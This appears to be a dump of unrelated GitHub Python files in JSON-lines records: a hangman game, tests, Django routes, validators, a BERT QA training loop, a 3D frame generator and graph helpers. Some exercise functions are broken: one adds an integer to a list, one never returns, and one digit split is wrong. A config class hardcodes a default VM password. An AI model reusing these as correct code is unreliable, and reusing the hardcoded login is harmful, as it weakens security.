self.hangman.draw()\n\n def run(self):\n self.draw_hang()\n self.draw_hangman()\n self.word_label.draw()\n self.wrong_attemps_label.draw()\n\n if not '_' in self.word:\n window.clear()\n pyglet.text.Label(\n 'You Win',\n font_name='Fira Code',\n font_size=56,\n x = window.width // 2,\n y = window.height // 2,\n anchor_x = 'center',\n anchor_y = 'center'\n ).draw()\n\n if len(self.wrong_attemps) >= 6:\n window.clear()\n pyglet.text.Label(\n 'Game Over',\n font_name='Fira Code',\n font_size=56,\n x = window.width // 2,\n y = window.height // 2,\n anchor_x = 'center',\n anchor_y = 'center'\n ).draw()\n pass\n\nselected_word = \"\"\nwith open('words.txt') as f:\n words = list()\n for word in f.readlines():\n words.append(word[:-1])\n\n selected_word = random.choice(words)\n\ngame = Game(selected_word)\n\n@window.event\ndef on_draw():\n window.clear()\n game.run()\n\n@window.event\ndef on_key_press(symbol, _):\n if chr(symbol) in string.ascii_letters:\n game.key_pressed(chr(symbol).lower())\n\nif __name__ == '__main__':\n pyglet.app.run()\n","repo_name":"1sa4c/hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27516112411","text":"\n\ndef separatorMode1(num):\n if num > 99:\n # Numero de 3 digitos.\n centenas = num / 100\n decenas = (num - centenas*100) / 10\n unidades = (num - decenas*10) / 1\n \n return unidades,decenas,centenas \n\ndef separatorMode2(num):\n c = (num / 100) % 100\n d = (num / 10) % 10\n u = (num / 1) % 1\n return c, d, u\n\ndef separatorMode3(num):\n if num > 999:\n res = num % 1000\n mil = (num - res) / 1000\n res2 = res % 100\n cen = (res - res2) / 100\n res3 = res2 % 10\n dec = (res2 - res3) / 10\n uni = res3\n \n return mil, cen, dec, uni\n \n if num > 99:\n res = num%100\n cen = (num-(res))/100\n res2 = res % 10\n dec = (res-(res2))/10\n uni = res2\n return cen, dec, uni\n \n[m,c, d, u] = separatorMode3(1235)\n\nprint(m , c , d , u)\n\n","repo_name":"23ft/esp32-micropython-weather-station-MQTT","sub_path":"dec_cent_mil.py","file_name":"dec_cent_mil.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17717884060","text":"import pytest\nimport uniplot.analysis\nimport uniplot.parse\n\nTEST_UNIPROT=\"./resources/uniprot_sprot_small.xml.gz\"\n\ndef test_hello_world():\n \"\"\"Does nothing useful\"\"\"\n assert True\n\ndef test_average():\n \"\"\"Tests the average length of proteins\"\"\"\n assert uniplot.analysis.average_len(\n uniplot.parse.uniprot_seqrecords(TEST_UNIPROT)\n ) == 302.72222222222223\n","repo_name":"jackbryan1/Biology-Analysis-Project","sub_path":"tests/test_analysis.py","file_name":"test_analysis.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28936305798","text":"def traj_num(N):\n K = [0, 1] + [0] * N\n for i in range(2, N+1):\n K[i] = K[i-2] + [i-1]\n return K[N]\n\n\ndef count_trajectories(N, allowed:list):\n K = [0, 1, allowed[2]] + [0]*(N-3)\n for i in range(3, N+1):\n if allowed[i]:\n K[i] = K[i-1] + K[i-2] + K[i-3]\n\n\ndef count_min_cost(N, price:list):\n C = [float(\"-inf\"), price[1], price[1]+price[2]]+[0]*(N-2)\n for i in range(3, N+1):\n C[i] = price[i] + min(C[i-1], C[i-2])\n return(C[N])\n\n \n\n\n\n\n\n\n","repo_name":"Hoasker/learning_python","sub_path":"lec_10/dynamic_prog.py","file_name":"dynamic_prog.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4730036825","text":"import pytest\n\nfrom savoten.domain import Candidate, EventItem, User\nfrom savoten.repository.memory import EventItemRepository\nfrom tests.util import get_public_vars\n\nuser_args = {\n 'name': 'test_user',\n 'email': 'test_user@test.com',\n 'permission': 100\n}\nuser = User(**user_args)\ncandidate_args = {'user': user}\ncandidate = Candidate(**candidate_args)\n\n\nclass TestSave:\n\n def setup_method(self):\n self.repository = EventItemRepository()\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name', [candidate])])\n def test_succeeds_when_event_item_has_no_id(self, event_item):\n saved_event_item = self.repository.save(event_item)\n assert get_public_vars(self.repository.event_items[\n saved_event_item.id]) == get_public_vars(event_item)\n\n @pytest.mark.parametrize('event_item, updated_event_item', [(EventItem(\n 'test_name', [candidate]), EventItem('updated', [candidate]))])\n def test_update_succeeds_when_event_item_has_same_id(\n self, event_item, updated_event_item):\n saved_event_item = self.repository.save(event_item)\n updated_event_item.id = saved_event_item.id\n self.repository.save(updated_event_item)\n assert get_public_vars(self.repository.event_items[\n saved_event_item.id]) == get_public_vars(updated_event_item)\n\n\nclass TestDelete:\n\n def setup_method(self):\n self.repository = EventItemRepository()\n self.repository.event_items[1] = [\n EventItem('test_name', [candidate], id=1)\n ]\n\n @pytest.fixture()\n def regist_event_item_to_event_id_map(self):\n event_id = 1\n event_item = EventItem('test_name', [candidate], id=1)\n self.repository.event_id_to_event_item_map[event_id] = [event_item]\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name', [candidate], id=1)])\n def test_succeeds_when_target_event_item_exists(self, event_item):\n self.repository.delete(event_item)\n\n @pytest.mark.parametrize('event_item, event_id',\n [(EventItem('test_name', [candidate], id=1), 1)])\n def test_succeeds_when_target_event_item_registerd_in_event_id_map(\n self, event_item, event_id, regist_event_item_to_event_id_map):\n self.repository.delete(event_item)\n for registed_event_items \\\n in self.repository.event_id_to_event_item_map.values():\n for registed_event_item in registed_event_items:\n assert event_item.id == registed_event_item.id\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name2', [candidate], id=2)])\n def test_return_value_error_when_target_event_item_does_not_exist(\n self, event_item):\n with pytest.raises(ValueError):\n assert self.repository.delete(event_item)\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name', [candidate], id=None)])\n def test_return_value_error_when_given_event_item_id_is_none(\n self, event_item):\n with pytest.raises(ValueError):\n assert self.repository.delete(event_item)\n\n\nclass TestFindById:\n\n @classmethod\n def setup_class(cls):\n cls.repository = EventItemRepository()\n cls.repository.event_items[1] = EventItem('test_name', [candidate],\n id=1)\n\n def test_return_event_item_when_target_id_exists(self):\n assert get_public_vars(\n self.repository.find_by_id(1)) == get_public_vars(\n self.repository.event_items[1])\n\n def test_return_none_if_target_id_does_not_exist(self):\n assert self.repository.find_by_id(100) is None\n\n\nclass TestFindByEventId:\n\n @classmethod\n def setup_class(cls):\n cls.repository = EventItemRepository()\n cls.test_event_items = [\n EventItem('test_name', [candidate], id=i) for i in range(1, 5)\n ]\n event_id = 1\n cls.repository.event_id_to_event_item_map[\n event_id] = cls.test_event_items\n\n def test_return_found_event_items_when_target_event_id_exists(self):\n assert set(self.repository.find_by_event_id(1)) == set(\n self.test_event_items)\n\n def test_return_none_when_target_event_item_does_not_exist(self):\n assert self.repository.find_by_event_id(2) is None\n","repo_name":"sato-mh/savoten","sub_path":"tests/unit/repository/test_event_item_repository.py","file_name":"test_event_item_repository.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73492165768","text":"\"\"\"RTdemo URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom RTdemo import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # path(\"parameter\",views.para_in,name='demo_page'),\n path(\"para_save/\", views.save_parameter, name='para_save'),\n # 显示当前章节名\n path(\"show_chapter/<int:cid>\", views.chapter_name, name='show_chapter'),\n # 按章节填写值\n path(\"filing/<int:chpid>/\", views.load_detail, name='filing'),\n path(\"testfiling/<int:chpid>/\", views.test_load_detail, name='testfiling'),\n\n path(\"\", views.para_in, name='demo'),\n path(\"<int:cid>/\", views.para_in, name='demo'),\n path(\"demo/\", views.para_in_new, name='demo_new'),\n\n # 主题示例页面\n path(\"tooltip/\", views.tooltip, name='tooltip'),\n\n # Excel sheet示例页\n path(\"sheet_demo/\", views.sheet_show, name='sheet_demo'),\n path(\"save_table/\", views.save_table, name='save_table'),\n path(\"csvsheet/\", views.csv_show, name='csvsheet'),\n path(\"test/\", views.test, name='test'),\n path(\"test1/\", views.test1, name='test1'),\n]\n","repo_name":"yqgz/RTdemo","sub_path":"RTdemo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16684445435","text":"from contextlib import suppress\n\nfrom django.core.validators import RegexValidator, _lazy_re_compile\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator, qs_filter\n\n\nclass UnattachedIssueValidator:\n \"\"\"\n Check a GitHubIssue doesn't have an Epic nor a Task attached\n \"\"\"\n\n requires_context = True\n\n def __call__(self, data, serializer):\n from .models import Epic, Task\n\n issue = data.get(\"issue\")\n if issue is None:\n return\n\n with suppress(Task.DoesNotExist):\n if issue.task != serializer.instance:\n raise serializers.ValidationError(\n {\"issue\": _(\"This issue is already attached to a task\")}\n )\n with suppress(Epic.DoesNotExist):\n if issue.epic != serializer.instance:\n raise serializers.ValidationError(\n {\"issue\": _(\"This issue is already attached to an epic\")}\n )\n\n\nclass CaseInsensitiveUniqueTogetherValidator(UniqueTogetherValidator):\n def process_field_name(self, field_name):\n \"\"\"\n Right now, we presume that certain names are string-y, and can be\n case-insensitive compared.\n \"\"\"\n if field_name == \"name\":\n return \"name__iexact\"\n return field_name\n\n def filter_queryset(self, attrs, queryset, serializer):\n \"\"\"\n Filter the queryset to all instances matching the given attributes.\n \"\"\"\n # This is a modified version of `UniqueTogetherValidator.filter_queryset`,\n # modifed to preprocess field names for case-insensitive matching.\n # It also handles filtering on soft-deletes if appropriate.\n\n # field names => field sources\n sources = [serializer.fields[field_name].source for field_name in self.fields]\n\n # If this is an update, then any unprovided field should\n # have its value set based on the existing instance attribute.\n if serializer.instance is not None:\n for source in sources:\n if source not in attrs:\n attrs[source] = getattr(serializer.instance, source)\n\n if hasattr(queryset, \"active\"):\n queryset = queryset.active()\n # Determine the filter keyword arguments and filter the queryset.\n filter_kwargs = {\n self.process_field_name(source): attrs[source] for source in sources\n }\n return qs_filter(queryset, **filter_kwargs)\n\n\nbranch_unicode_re = _lazy_re_compile(r\"^[-\\w/]+\\Z\")\nvalidate_unicode_branch = RegexValidator(\n branch_unicode_re,\n _(\n \"Enter a valid 'branch' consisting of Unicode letters, numbers, underscores, \"\n \"slashes, or hyphens.\"\n ),\n \"invalid\",\n)\n","repo_name":"SFDO-Tooling/Metecho","sub_path":"metecho/api/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"16"} +{"seq_id":"35021610347","text":"import waltz\nfrom configs.config import SERVER\n\nurls = ('/compose/?', 'routes.email.Compose',\n '/emails/(.+)', 'routes.email.Read',\n '/emails/?', 'routes.email.Inbox',\n '/login/?', 'routes.auth.Login',\n '/logout/?', 'routes.auth.Logout',\n '/', 'routes.index.Index')\n\n# Default values for new client sessions\nsession_defaults = {'logged': False,\n 'email': None,\n 'passwd': None,\n 'admin': False,\n }\n\n# Make the following variable and methods available for use within the\n# html templates)\nenv = {'ctx': waltz.web.ctx,\n 'session': waltz.session,\n 'len': len,\n }\n\napp = waltz.setup.dancefloor(urls, globals(), sessions=session_defaults, env=env,\n debug=SERVER['DEBUG_MODE'])\n\nif __name__ == \"__main__\":\n app.run()\n\n","repo_name":"mekarpeles/sendr","sub_path":"sendr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70022278410","text":"def get_sort_indexes(arr):\n arr2 = merge_sorted(arr)\n n = len(arr) - 1\n m = 0\n n_done = False\n m_done = False\n while n != m and not (n_done and m_done):\n if arr[n] == arr2[n]:\n n -= 1\n else:\n n_done = True\n if arr[m] == arr2[m]:\n m += 1\n else:\n m_done = True\n return m, n\n\ndef merge_sorted(arr):\n if len(arr) == 1:\n return arr\n mid = len(arr) // 2\n l = merge_sorted(arr[:mid])\n r = merge_sorted(arr[mid:])\n return merge(l,r)\n\ndef merge(l,r):\n ans = l[:]\n ans.extend(r[:])\n i1 = 0\n i2 = 0\n z = 0\n while i1 < len(l) and i2 < len(r):\n if l[i1] <= r[i2]:\n ans[z] = l[i1]\n i1 += 1\n z += 1\n else:\n ans[z] = r[i2]\n i2 += 1\n z += 1\n while i1 < len(l):\n ans[z] = l[i1]\n i1 += 1\n z += 1\n return ans","repo_name":"angelusualle/algorithms","sub_path":"cracking_the_coding_interview_qs/16.16/get_sort_indexes.py","file_name":"get_sort_indexes.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36589312844","text":"'''\n\n@author: FangSun\n'''\n\n\nimport zstackwoodpecker.test_lib as test_lib\nimport zstackwoodpecker.test_state as test_state\nimport zstackwoodpecker.test_util as test_util\n\n\ntest_stub = test_lib.lib_get_test_stub()\ntest_obj_dict = test_state.TestStateDict()\n\n\ndef test():\n\n pub_l3_vm, flat_l3_vm, vr_l3_vm = test_stub.generate_pub_test_vm(tbj=test_obj_dict)\n\n flat_vip = test_stub.create_vip('create_flat_vip')\n test_obj_dict.add_vip(flat_vip)\n vr_vip = test_stub.create_vip('create_vr_vip')\n test_obj_dict.add_vip(vr_vip)\n\n test.flat_eip = test_stub.create_eip('create flat eip', vip_uuid=flat_vip.get_vip().uuid,\n vnic_uuid=flat_l3_vm.get_vm().vmNics[0].uuid, vm_obj=flat_l3_vm)\n\n test.vr_eip = test_stub.create_eip('create vr eip', vip_uuid=vr_vip.get_vip().uuid,\n vnic_uuid=vr_l3_vm.get_vm().vmNics[0].uuid, vm_obj=vr_l3_vm)\n\n flat_vip.attach_eip(test.flat_eip)\n vr_vip.attach_eip(test.vr_eip)\n\n for vm in (flat_l3_vm, vr_l3_vm):\n vm.check()\n\n for ip in [pub_l3_vm.get_vm().vmNics[0].ip, flat_vip.get_vip().ip, vr_vip.get_vip().ip]:\n if not test_lib.lib_check_directly_ping(ip):\n test_util.test_fail('expected to be able to ping vip while it fail')\n\n test_util.test_pass('pub vm volume network test pass')\n\n\ndef env_recover():\n test.flat_eip.delete()\n test.vr_eip.delete()\n test_lib.lib_error_cleanup(test_obj_dict)\n","repo_name":"bgerxx/woodpecker","sub_path":"integrationtest/vm/virtualrouter/pub_l3_vm/test_pub_vm_network.py","file_name":"test_pub_vm_network.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40503031417","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom transformers import AdamW\nfrom tqdm import tqdm\nfrom transformers import BertForQuestionAnswering\nimport numpy as np\n\n\ndef train_lm_squad(\n train_dataset,\n tokenizer,\n epochs=20,\n pretrained_model_name=\"shahrukhx01/chemical-bert-uncased\",\n save_model_name=\"chemical-bert-uncased-squad\",\n):\n def train_collate(batch):\n len_batch = len(batch)\n batch = list(filter(lambda x: x is not None, batch))\n\n if len_batch > len(batch):\n db_len = len(train_dataset)\n diff = len_batch - len(batch)\n while diff != 0:\n a = train_dataset[np.random.randint(0, db_len)]\n if a is None:\n continue\n batch.append(a)\n diff -= 1\n\n return torch.utils.data.dataloader.default_collate(batch)\n\n model = BertForQuestionAnswering.from_pretrained(pretrained_model_name)\n\n # setup GPU/CPU\n device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n # move model over to detected device\n model.to(device)\n # activate training mode of model\n model.train()\n # initialize adam optimizer with weight decay (reduces chance of overfitting)\n optim = AdamW(model.parameters(), lr=5e-5)\n\n # initialize data loader for training data\n train_loader = DataLoader(\n train_dataset, batch_size=16, shuffle=True, collate_fn=train_collate\n )\n\n for epoch in range(epochs):\n # set model to train mode\n model.train()\n # setup loop (we use tqdm for the progress bar)\n loop = tqdm(train_loader, leave=True)\n for batch in loop:\n try:\n # initialize calculated gradients (from prev step)\n optim.zero_grad()\n # pull all the tensor batches required for training\n input_ids = batch[\"input_ids\"].to(device)\n attention_mask = batch[\"attention_mask\"].to(device)\n start_positions = batch[\"start_positions\"].to(device)\n end_positions = batch[\"end_positions\"].to(device)\n # train model on batch and return outputs (incl. loss)\n outputs = model(\n input_ids,\n attention_mask=attention_mask,\n start_positions=start_positions,\n end_positions=end_positions,\n )\n # extract loss\n loss = outputs[0]\n # calculate loss for every parameter that needs grad update\n loss.backward()\n # update parameters\n optim.step()\n # print relevant info to progress bar\n loop.set_description(f\"Epoch {epoch}\")\n loop.set_postfix(loss=loss.item())\n except:\n continue\n\n model.save_pretrained(f\"{save_model_name}_{epoch}\")\n tokenizer.save_pretrained(f\"{save_model_name}_{epoch}\")\n\n return model, device\n","repo_name":"shahrukhx01/finetune-domain-lm-squad","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26006613529","text":"from pyplasm import *\nimport csv\nfrom ast import literal_eval as make_tuple\n\n \ndef intersperse(seq, value):\n \"\"\"\n intersperse is a function that, given a list and a value, intersperse the list with the value.\n If the resultant list has an odd number of elements,\n a value is appended to the end of it.\n \n @param seq: the list to intersperse\n @param value: the value to insert into the new list\n @return res: a new list interspersed\n \"\"\"\n res = [value] * (2 * len(seq) - 1)\n res[::2] = seq\n if (len(res)%2 != 0):\n res.append(value)\n return res\n \ndef drawStructure(beamDimensions, pillarDimensions, pillarDistances, interstoryHeights):\n \"\"\"\n drawStructure is a function that, given beam's dimensions, pillars's dimensions, distances between the pillars (y-axis),\n interstory's heights (z-axis), return an HPC model of a space frame of reinforced concrete.\n \n @param beamDimensions: tuple, representing the dimensions of a beam (x,z)\n @param pillarDimensions: tuple, representing the dimensions of a pillar (x,y)\n @param pillarDistances: list representing the distances between pillars [dy1, dy2, ...]\n @param interstoryHeights: list representing the heights of every interstory [dz1, dz2, dz3, ...]\n @return model: HPC model of the space frame\n \"\"\"\n \t\n #generating values for the pillars Y-axis\n pillarDistances = [0] + pillarDistances\n linearPillars = intersperse(pillarDistances, pillarDimensions[1])\n \n #generating pillars HPC model\n pillars3D = INSR(PROD)([QUOTE([pillarDimensions[0], -3]),QUOTE(linearPillars), QUOTE(intersperse([-interstory for interstory in interstoryHeights], -beamDimensions[1]))])\n \n #generating values for horizontal beams perpendicular to the Y-axis\n horizontalBeamXYAxis = [pillarDimensions[0],-3]\n horizontalBeamYYAxis = intersperse([-beam for beam in pillarDistances], pillarDimensions[1])\n horizontalBeamYYAxis[0] = -horizontalBeamYYAxis[0]\n \n #generating HPC model of the beams perpendicular to the Y-axis\n beamsY3D = INSR(PROD)([QUOTE(horizontalBeamXYAxis), QUOTE(horizontalBeamYYAxis), QUOTE(intersperse(interstoryHeights,beamDimensions[1]))])\n \n #assembling the HPC model\n model = STRUCT([pillars3D, beamsY3D])\n return model\n\ndef generate_beams(file_name):\n\t\"\"\"\n\tgenerateBeams is a function that, given a csv file name generate the 3D HPC model of the beams. Actually the function uses \";\"\n\tas default delimiter instead of the classic \",\", that's useful in order to correctly parse lists and their elements.\n\t@param file_name: the csv file name \n\t@return: the 3D HPC model of the beams\n\t\"\"\"\n\t#generating 1D beams list X-axis \n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\t\tbeamlengthX = []\n\t\tbeamlengthZ = []\n\t\tdata = []\n\t\taccumulator = 0\n\t\tfor row in reader:\n\t\t\taccumulator = accumulator + 1\n\t\t\tdata.append(row)\n\t\t\tif(accumulator == 2):\n\t\t\t\tif(float(data[0][0]) == 0):\n\t\t\t\t\tbeamlengthX.append(-(make_tuple(data[1][1])[0]))\n\t\t\t\telse:\n\t\t\t\t\tbeamlengthX.append(float(data[0][0])-make_tuple(data[1][1])[0])\n\t\t\t\t\tbeamlengthX.append(-(make_tuple(data[1][1])[0]))\n\t\t\t\taccumulator = 0\n\t\t\t\tdata = []\n\t#generating 1D beams list Y-axis \n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\t\tdata = []\n\t\tbeamlengthY = []\n\t\taccumulator = 0\n\t\tfor row in reader:\n\t\t\tbeamlengthY = []\n\t\t\taccumulator = accumulator + 1\n\t\t\tdata.append(row)\n\t\t\tif(accumulator == 2):\n\t\t\t\tbeamlengthY.append(make_tuple(data[1][1])[1])\n\t\t\t\tfor element in make_tuple(data[1][2]):\n\t\t\t\t\tbeamlengthY.append(element)\n\t\t\t\t\tbeamlengthY.append(make_tuple(data[1][1])[1])\n\t\t\t\taccumulator = 0\n\t\t\t\tdata = []\n\t#generating 1D beams list Z-axis \n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\t\tbeamlengthZ = []\n\t\taccumulator = 0\n\t\tfor row in reader:\n\t\t\taccumulator += 1\n\t\t\tif(accumulator == 2):\n\t\t\t\tbeamlengthZ = intersperse(make_tuple(row[3]), make_tuple(row[0])[1])\n\t\t\t\tbreak\n\t#returning the 3D HPC model of the beams\n\treturn INSR(PROD)([QUOTE(beamlengthX), QUOTE(beamlengthY), QUOTE(beamlengthZ)])\n\n \ndef ggpl_bone_structure(file_name):\n\t\"\"\"\n\tggpl_bone_structure is a function that, given a file name create an entire 3D parametric (spatial) \n\tbuilding frame in reinforced concrete. The parametrization is given by the csv file named \"file_name\".\n\t@param file_name: the file name of the csv file containing the dataset\n\t@return : the 3D HPC model of the parametric (spatial) building frame in reinforced concrete\n\t\"\"\"\n\n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\n\t\t#used to store partial csv lines, usually 2\n\t\tdata = []\n\n\t\t#list of 3D models\n\t\tframeList = []\n\n\t\t#distances used to calculate the starting point of every frame\n\t\txdist = 0\n\t\tydist = 0 \n\t\tzdist = 0\n\n\t\t#value used to control the iteration through the csv dataset\n\t\taccumulator = 0\n\n\t\tfor row in reader:\n\t\t\taccumulator = accumulator + 1\n\t\t\tdata.append(row)\n\n\t\t\t#if we had read 2 lines\n\t\t\tif(accumulator == 2):\n\n\t\t\t\t#variable rename and casting\n\t\t\t\txPillar = float(data[0][0])\n\t\t\t\tyPillar = float(data[0][1])\n\t\t\t\tzPillar = float(data[0][2])\n\t\t\t\tbeamDimensions = make_tuple(data[1][0])\n\t\t\t\tpillarDimensions = make_tuple(data[1][1])\n\t\t\t\tpillarDistances = make_tuple(data[1][2])\n\t\t\t\tinterstoryHeights = make_tuple(data[1][3])\n\n\t\t\t\txdist = xdist + xPillar\n\t\t\t\tydist = ydist + yPillar\n\t\t\t\tzdist = zdist + zPillar\n\n\t\t\t\t#generating the frame\n\t\t\t\tmodel = drawStructure(beamDimensions, pillarDimensions, pillarDistances, interstoryHeights)\n\n\t\t\t\t#translating the frame according to the dataset\n\t\t\t\tframeElement = STRUCT([T(1)(xdist), T(2)(ydist), T(3)(zdist), model])\n\n\t\t\t\t#saving the new frame\n\t\t\t\tframeList.append(STRUCT([frameElement]))\n\n\t\t\t\t#restart iteration \n\t\t\t\taccumulator = 0\n\t\t\t\tdata = []\n\n\t\tframeList.append(generate_beams(file_name))\n\t\treturn STRUCT(frameList)\n\n \nVIEW(ggpl_bone_structure(\"frame_data_461400.csv\"))","repo_name":"gabmarini/ggpl","sub_path":"2016-10-21/workshop_02.py","file_name":"workshop_02.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10257822730","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Srikanth Mujjiga\"\n__copyright__ = \"Srikanth Mujjiga\"\n__license__ = \"mit\"\n\nimport sys\nfrom setuptools import setup\n\nentry_points = \"\"\"\n\"\"\"\n\ndef setup_package():\n needs_sphinx = {'build_sphinx', 'upload_docs'}.intersection(sys.argv)\n sphinx = ['sphinx'] if needs_sphinx else []\n setup(setup_requires=['pyscaffold>=3.0a0,<3.1a0'] + sphinx,\n entry_points=entry_points,\n use_pyscaffold=True)\n\nif __name__ == \"__main__\":\n setup_package()\n","repo_name":"smujjiga/pymm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"34941491573","text":"\nclass Node:\n def __init__(self, val):\n self.value = val\n self.leftChild = None\n self.rightChild = None\n self.dis = 9999\n\nclass Solution:\n def minHeight(self, root):\n visit = []\n root.dis = 1\n while root.leftChild or root.rightChild:\n if root.leftChild:\n root.leftChild.dis = root.dis + 1\n visit.append(root.leftChild)\n if root.rightChild:\n root.rightChild.dis = root.dis + 1\n visit.append(root.rightChild)\n root = visit.pop(0)\n return root.dis\n\n# build the BST\nnode1 = Node(10)\nnode2 = Node(5)\nnode3 = Node(11)\nnode4 = Node(14)\nnode1.leftChild = node2\nnode1.rightChild = node3\nnode3.rightChild = node4\n\ns = Solution()\nprint(s.minHeight(node1)) # 2\n\nnode5 = Node(2)\nnode6 = Node(7)\nnode2.leftChild = node5\nprint(s.minHeight(node1)) # 3\nnode2.rightChild = node6\nprint(s.minHeight(node1)) # 3","repo_name":"jianfeiZhao/Data-Structure-and-Algorithms","sub_path":"LeetCode/minHeightOfBST.py","file_name":"minHeightOfBST.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21366535695","text":"from time import time\nimport networkx as nx\nfrom closures import save_and_draw_graph\nimport os\nimport glob\nimport re\n\n\nclass Counter:\n def __init__(self, id=1000):\n self.c = id\n\n def get(self):\n return self.c\n\n def inc(self):\n self.c += 1\n return self.c\n\n\nclass Context:\n def __init__(self, cnt=Counter(), op_cnt=0, start_time=int(time()), per_step_show=True, colors_dict=dict()):\n self.cnt = cnt\n self.time = start_time\n self.op_cnt = op_cnt # operation counter (current count of graph transformation)\n self.per_step_show = per_step_show\n self.colors_dict = colors_dict\n\n def inc(self):\n self.cnt += 1\n\n def op_inc(self):\n self.op_cnt += 1\n\n def renew_time(self):\n self.time = int(time())\n\n def disable_per_step_show(self):\n self.per_step_show = False\n\n def enable_per_step_show(self):\n self.per_step_show = True\n\n def compose_name(self, suffix=\"\"):\n return \"pic_\" + str(self.time) + \"_\" + str(self.op_cnt) + suffix + \".png\"\n\n\ndef print_fig(G, ctx, suffix):\n if ctx.per_step_show:\n save_and_draw_graph(G, num_palette=ctx.colors_dict, pic_name=ctx.compose_name(suffix), show_graph=False)\n ctx.op_inc()\n\n\ntypes = {'p': 'pid_ns',\n 'g': 's',\n 's': 'pid_ns',\n 'pid_ns': 'pid_ns'}\n\n\nclasses = {'p': 'FF',\n 'g': 'SI',\n 's': 'HI',\n 'pid_ns': 'HI'}\n\n\ndef get_free_cnt(cnt):\n return cnt.inc()\n\n\ndef get_parent(G, item):\n for (u,x,k) in G.out_edges(item, keys=True):\n if k == 'pred':\n return x\n\n for (u, x, k) in G.out_edges(G.nodes[item]['ppid'], keys=True):\n if k == 'h' and G.nodes[x]['ppid'] == G.nodes[u]['pid']:\n return u\n\n return G.nodes[item]['ppid']\n\n\ndef has_in_syscall(G,v):\n for (x,y,z) in list(G.in_edges(v,keys=True)):\n if (z.endswith(')')):\n return y\n\n return None\n\n\nclass Netconfig:\n def __init__(self,host='192.168.1.103', port='22', user='osboxes', password='osboxes.org',prog_prefix=''):\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.prog_prefix = prog_prefix\n\n\nclass tcolor:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\ndef rearrange_labels(text,new_numbers):\n result = re.split(r'[();,\\s]\\s*', text)# \"setpgid,x,y,\"\n result.remove('')\n try:\n label = result[0]+\"(\" +str(new_numbers[int(result[1])])+\",\"+str(new_numbers[int(result[2])])+\")\"\n except KeyError as e:\n label = result[0] + \"(\" + \"0\" + \",\" + \"0\" + \")\"\n return label\n\n\ndef rearrange_indexes(G, shift=1, full_tree=True):\n old_index = list()\n new_index = dict()\n top_order_list = list(prior_topological_sort(G)) # bfs_edges\n idx = 0\n for v in top_order_list:\n for u,v,k in G.in_edges(v, keys=True):\n if k == 'fork()': # v born from u\n idx += 1\n old_index.append(G.nodes[v]['pid'])\n new_index[G.nodes[v]['pid']] = idx + shift\n break\n\n if full_tree:\n new_index[1] = 1\n\n for v in top_order_list:\n for u, v, k in G.in_edges(v, keys=True):\n if k == \"follow\": # filter 